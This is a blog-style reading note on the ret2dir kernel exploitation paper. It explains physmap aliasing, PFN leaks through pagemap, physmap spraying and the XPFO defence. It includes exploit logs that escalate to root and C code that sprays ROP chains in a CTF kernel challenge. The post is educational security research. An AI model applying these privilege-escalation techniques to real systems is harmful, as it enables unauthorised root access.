1. Introduction

We have learnt some kernel PWN techniques and cases. The exploitations and mitigations bypassing are always charming, while mitigations evolve as well. In this post, we will talk about the ret2dir technique, which leverages the functionality of physmap to place attack-controlled payload in kernel, bypassing existing ret2usr defenses like SMEP, SMAP, PXN, KERNEXEC, UDEREF and kGuard.

ret2dir is first published by Vasileios P. Kemerlis, Michalis Polychronakis and Angelos D. Keromytis in [their paper](Vasileios P. Kemerlis, Michalis Polychronakis, Angelos D. Keromytis) in 2014. Hence, this post serves as a reading note for this paper as well.

After ret2dir was published, some articles (e.g., this one and this one) pointed out that it is not a big threat. Their arguments are:

  1. x86(v4.6) and arm64(v4.9) have made all kernel memory X^W, which means attacker can not execute shellcode located in physmap in kernel context any longer, but only place ROP chain there.
  2. As one of the article authors said, even under kernel <= 3.9, the kernel patched with PaX/Grsecurity can prevent ret2dir attack without enabling any features.
  3. The fully ret2dir attack is based on page frame number (PFN) information, while only users with the CAP_SYS_ADMIN capability can get PFNs from /proc/<pid>/pagemap since Linux 4.0.

The original ret2dir may not work on up-to-date hosts now. However, physmap spraying is still an effective way in some situations. Anyway, ret2dir is worthwhile to learn about.

BTW, grsecurity-101-tutorials is a great repository where you can learn a lot about Linux kernel security.

2. Paper Information

Meta Info
Title ret2dir: Rethinking Kernel Isolation
Author(s) Vasileios P. Kemerlis, Michalis Polychronakis, Angelos D. Keromytis
Institution(s) Columbia University
Published in 2014 USENIX Security Symposium (23th)
Link USENIX

BTW, ret2dir was also presented on Blackhat Europe 2014.

3. What ret2dir is

It is not a difficult thing to understand ret2dir. However, it would be helpful if we first talk about ret2usr, which is the most well-known Linux kernel exploit technique. As the slides by Vasileios P. Kemerlis showed, the idea of ret2usr dates back to at least 1978. The paper published by Gerald J. Popek and David A. Farber on Communications of the ACM wrote:

Control was therefore returned to user code at his virtual location zero–in privileged mode!

That’s it! ret2usr means that the attackers try to hijack code or data pointers into attacker-controlled memory in user space, so as to execute malicious located there in kernel context. As a result, many mitigations like SMEP, SMAP, PXN, KERNEXEC, UDEREF and kGuard have been proposed to make ret2usr fail.

One general idea to bypass these mitigations is to somehow place payload in kernel address space validly, as few of mitigations above prevent pointer dereference to somewhere in kernel space. Following this idea, one common way is to deliver payload into buffer on kernel stack or heap via system calls. In this way, attackers must be able to leak stack address or heap address when KASLR is enabled.

Another way to place payload in kernel space is ret2dir. Note that many other ways could work as well, but let’s focus on ret2dir in this post.

According to the related paper, ret2dir (return-to-direct-mapped memory) leverages a kernel region that directly maps part or all of a system’s physical memory to bypass existing ret2usr protections, enabling attackers to essentially “mirror” user-space data within the kernel address space.

On Linux, such a region is named physmap, which can be found in Linux virtual memory map:

image-20230202171704555

As the diagram shows, physmap is a large, contiguous virtual memory region inside kernel address space, which contains a direct mapping of part of part or all (depending on the architecture) physical memory, resulting in address aliasing. The memory of an attacker-controlled user process is accessible through its kernel-resident synonym. What’s more, the mapping of physical memory starts at a fixed, known location, regardless of KASLR. In x86-64 systems, the physmap maps the entire RAM of the system into a 64TB region directly in a 1:1 manner, starting from page frame zero. The situation is different on 32-bit architecture.

The demonstrations and comparison of ret2usr and ret2dir are shown below (excerpted from the paper):

image-20230202165744044

Also, the paper wrote that in x86, physmap is mapped as RW in all kernel versions; while in x86-64, the permissions of physmap are RWX up to kernel v3.8.13; only very recent kernels (≥ v3.9) use RW mapping.

4. How ret2dir works

To mount a ret2dir attack, the first step is to map the exploit payload in user space. The malicious payload will appear in kernel space once a page frame is given to the attacking process.

Naturally, the next critical question is how to locate the synonym address in kernel space. If we can pinpoint the payload in kernel space, the rest of exploitation is similar to common kernel PWNs.

Two ways are proposed in this paper. The first is to read page frame information from Procfs. The second one is to spray as much as payload in user space, so as to make sure the target kernel address in physmap contain the payload in high probability. As we said before, because only users with the CAP_SYS_ADMIN capability can get PFNs from Procfs since Linux 4.0, the latter one is the only feasible way to conduct ret2dir now.

BTW, in this post, we will concentrate on x86-64 Linux environment.

4.1 Leak PFNs via Procfs

As it is not permitted to read PFNs from Procfs without CAP_SYS_ADMIN capability any longer, we will introduce the this technique briefly.

For each user-space page, /proc/<pid>/pagemap provides a 64-bit value, indexed by virtual page number, bits [0:54] of which encoding the page frame number. Based on these numbers, we can calculate the synonym address of a given user-space virtual address:

PFN(uaddr) = pagemap[(uaddr / 4096) * sizeof(uint64_t)][0:54]
SYN(uaddr) = PHYS_OFFSET + 4096 * (PFN(uaddr) - PFN_MIN)

The getpmap.c program demonstrates how to calculate PFN(uaddr). As shown below, it failed to leak PFN without CAP_SYS_ADMIN:

➜  ~ id
uid=1000(rambo) gid=1000(rambo) groups=1000(rambo)
➜  ~ cat /proc/$$/maps | grep "/usr/bin/zsh" | head -n 1
55ab0e776000-55ab0e78d000 r--p 00000000 fc:01 73384                      /usr/bin/zsh
➜  ~ ./getpmap --pid=$$ --virt=0x55ab0e776000
PFN[0x55ab0e776000]: 0
➜  ~ sudo ./getpmap --pid=$$ --virt=0x55ab0e776000
PFN[0x55ab0e776000]: 1216935

4.2 physmap Spraying

If attackers can not get necessary information to locate the synonym address in kernel space, spraying may work. It is very similar to other spraying-like techniques, e.g., heap spraying. The attacker can pick an arbitrary physmap address, and try his or her best to ensure that the corresponding page frame is mapped by a user page containing the payload, which can be achieved by filling the address space of the attacking process with copies of payload.

Some optimizations (e.g., excluding pages frames that buddy allocator will never allocate to user space) are introduced in the paper, in order to help increase the hit rate, which could reach as high as 96%.

4.3 The Rest of Exploitation

If physmap is executable, attackers can just place shellcode there and then hijack the control flow. If it is non-executable, ROP is needed. The control flow should be firstly hijacked to a stack pivoting gadget, which transfers the kernel stack onto the ROP chain in physmap.

5. Defense: eXclusive Page Frame Ownership (XPFO)

In order to mitigate ret2dir, researchers designed an eXclusive Page Frame Ownerwhip (XPFO) scheme for the Linux kernel in the paper. The idea is to prevent page frames from being assigned to both kernel and user space, unless a kernel component explicitly requests that.

As the paper wrote, XPFO introduces a minimal overhead ranging between 0.18–2.91%. The implementation of XPFO can be found here.

6. Reproduction

The original ret2dir can’t work on latter kernels, while the physmap spraying technique still works in some situations. Hence, in this section we will first reproduce some cases from the paper, and then try to apply physmap spraying in a kernel PWN challenge we did before.

6.1 Reproduce Experiments in the Paper

Paper authors conducted experiments in virtual machines and shared these machines online. Thanks to them and virtualization technology, we can download the whole experiment environment and reproduce all the experiments 9 years later without effort. In this part, we download the 64-bit virtual machine and reproduce the exploitation.

Boot the virtual machine, and you will see options for different kernel envrionments with intuitive names:

Xnip2023-02-02_14-23-23

Let’s take CVE-2013-2094 (OOB) for example.

With SMEP disabled (the third option), ret2usr works:

Searchin...
detected CONFIG_JUMP_LABEL
perf_swevent_enabled is at 0xffffffff81ef7180
IDT at 0xffffffff81df8000
Using interrupt 4
Shellcode at 0x81000000
Triggering sploit
Got signal
Launching shell
# 

With SMEP enabled (the first option), ret2usr fails and the kernel crashes.

With SMEP enabled (the first option), ret2dir succeeds in escalating the privilege:

[^] Linux kernel `PERF_EVENTS' (CVE-2013-2094) exploit
    by Vasileios P. Kemerlis (vpk)
[+] `perf_swevent_enabled[]' is located at 0xffffffff81ef7180
[+] `&apparmor_ops.shm_shmat' is located at 0xffffffff81c71aa8
[+] `perf_swevent_enabled[0xfffffffffffe51b7]=&apparmor_ops.shm_shmat'
[+] `apparmor_ops.shm_shmat=0xffffffff812db050'
[+] target address is 0xffffffff81304e62 (diff: 0x29e12)
[?] check if we have (at least) 171538 (0x29e12) file descriptors available
[?] check if we can spawn enough child processes
[+] forking 167 processes...(done)
[+] invoking `perf_swevent_init()' x171538...(done)
[+] try to map a proper synonym page
[?] 0x7f1f27bc9000 is kernel-mapped at 0xffff88003613a000
[?] 0x7f1f27bc8000 is kernel-mapped at 0xffff880027edf000
[+] shellcode stitching (0x7f1f27bc8000 <-> 0xffff880027edf000)
[+] elevate privileges (w/out touching user space)
[+] invoking `perf_swevent_destroy()' x171538...(done)
[*] Got r00t!
# 

Note that for the ret2dir case, SMAP and KASLR are disabled. The ExP directly leaks PFNs via Procfs and hijacks the control flow to shellcode in physmap, no ROP used. Another ExP for CVE-2010-3904 places ROP chain in physmap for escalation.

6.2 Rewrite Former ExP with physmap Spraying

In this part, we will try out the physmap spraying technique in a former kernel PWN challenge, a heap-based OOB issue (you can find the original ExP here).

We will place the ROP chain in physmap, instead of the victim driver’s buffer. Then, pivot the kernel stack to our ROP chain.

According to an article, we can place some probe strings in the mmap-ed page to facilitate the debugging work. After debugging the kernel with GDB, we find that the first page containing the probe string is located before the g_buf buffer in slab. The address is not fixed among different bootings, which could be 0xffff888001a39000 at one time but 0xffff888001a37000 at another time. The g_buf would be something like 0xffff8880030d9000, which may changes as well.

With these findings, if we spray 64MB in physmap, then the end of sprayed memory could be near 0xffff888005a30000, which means that g_buf is located between the first sprayed page and the last sprayed page. This information is very useful, as we can just add some offset to the leaked g_buf address to get the page addess which may contain our payload. After testing, we find that g_buf + 16MB is a good candidate.

Now we can have a try. The main modification to the original ExP is shown as below:

printf("[*] spraying 16*1024 pages containing ROP chain in physmap\n");
void *physmap_spray[16*1024];
void *mp;
for (int i = 0; i < 16*1024; i++) { // 64MB
    mp = mmap(NULL, 4096, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    memcpy(mp, buf, 0x500);
    physmap_spray[i] = mp;
}
uint64_t physmap_ptr = (g_buf & 0xfffffffffffff000) + 16*1024*1024;
printf("[*] assuming page at g_buf+16MB (0x%lx) contains ROP chain\n", physmap_ptr);
printf("[*] invoking ioctl to hijack control flow\n");
for (int i = 0; i < SPRAY_NUM; i++)
    ioctl(spray[i], 0xdeadbeef, physmap_ptr - 0x10);

You can find the modified ExP based on physmap spraying here. The whole exploit process is shown as below:

/ $ /exploit
[*] saving user land state
[*] spraying 50 tty_struct objects
[+] /dev/holstein opened
[*] spraying 50 tty_struct objects
[*] leaking kernel base and g_buf with OOB read
[+] leaked kernel base address: 0xffffffff81000000
[+] leaked g_buf address: 0xffff8880030d9000
[*] crafting rop chain
[*] overwriting the adjacent tty_struct
[*] spraying 16*1024 pages containing ROP chain in physmap
[*] assuming page at g_buf+16MB (0xffff8880040d9000) contains ROP chain
[*] invoking ioctl to hijack control flow
[+] returned to user land
[+] got root (uid = 0)
[*] spawning shell
/ # id
uid=0(root) gid=0(root)

BTW, sometimes when you have AAR capability, you can just search for the target page in physmap beginning from one slab address or elsewhere. However, it is not feasible in many OOB cases.

7. Summary

In this post, we learn the ret2dir technique, which could be used to deliver shellcode or ROP chain into kernel space. Although the original technique is mitigated by some enforcements today, the physmap spraying technique still works well with ROP in some situations.

Another paper by Xu et al. (2015) is highly recommended, which has much discussion on physmap-based exploitation against UAF vulnerabilities. I translated this paper into Chinese three years ago. Derived from these two papers, physmap spraying can be used at least in two ways:

  1. Place ROP chain. You can choose physmap whenever you need an area to place ROP chain.
  2. Create collision to overwrite victim object. This is for UAF vulnerabilities.

PWN is so charming that there are always new offensive and defensive techniques, and infinite possibilities. Keep hacking!